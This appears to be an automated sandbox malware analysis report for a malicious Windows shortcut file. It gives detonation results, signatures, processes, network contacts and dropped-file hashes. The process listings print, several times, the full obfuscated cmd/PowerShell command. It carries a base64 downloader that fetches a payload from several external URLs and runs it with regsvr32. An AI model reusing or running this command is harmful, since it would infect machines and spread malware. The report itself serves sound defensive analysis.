Malware Analysis Report

2024-12-07 16:17

Sample ID 241113-nz9y4a1jdv
Target 013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24
SHA256 013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24

Threat Level: Likely malicious

The file 013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24 was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

An obfuscated cmd.exe command-line is typically used to evade detection.

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 11:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 11:51

Reported

2024-11-13 11:53

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /v:on /c GTlZotS9zHLhEzCDMVbFWmYDHjUPPOgRtOUiWEAvvJDy26RCVDiWwI2MM1NVc/bUuTmj+3A7||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"

Network

N/A

Files

memory/2792-40-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp

memory/2792-41-0x000000001B780000-0x000000001BA62000-memory.dmp

memory/2792-42-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

memory/2792-43-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2792-44-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2792-45-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2792-46-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2792-48-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2792-47-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 11:51

Reported

2024-11-13 11:53

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /v:on /c GTlZotS9zHLhEzCDMVbFWmYDHjUPPOgRtOUiWEAvvJDy26RCVDiWwI2MM1NVc/bUuTmj+3A7||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"

C:\Windows\system32\regsvr32.exe

"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\IRqRB\iKFsqCCszk.HpU

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 baudesign.ge udp
GE 45.138.44.231:80 baudesign.ge tcp
GE 45.138.44.231:443 baudesign.ge tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 231.44.138.45.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/5032-0-0x00007FFF34EC3000-0x00007FFF34EC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dbn0weny.32b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5032-1-0x00000234B7A40000-0x00000234B7A62000-memory.dmp

memory/5032-11-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp

memory/5032-12-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp

C:\Users\Admin\AppData\Local\IRqRB\iKFsqCCszk.HpU

MD5 66aa173a8aff58102540c8f7e4b3bd07
SHA1 6731120f0a7523f530303ba6cbd18e016f740789
SHA256 36c850f3cc750f3a0dcbb1fe6e8c278529e9ec59628893c5cbb1836508dbf329
SHA512 e810c657473e2dad9bb6c04714a37f6f7c34d4243b8006441841947efcff9c31b0511b80bed6f6211d1f23a2f4bf1b0984624c33911d31802eb37dd1771e6ff3

memory/5032-17-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp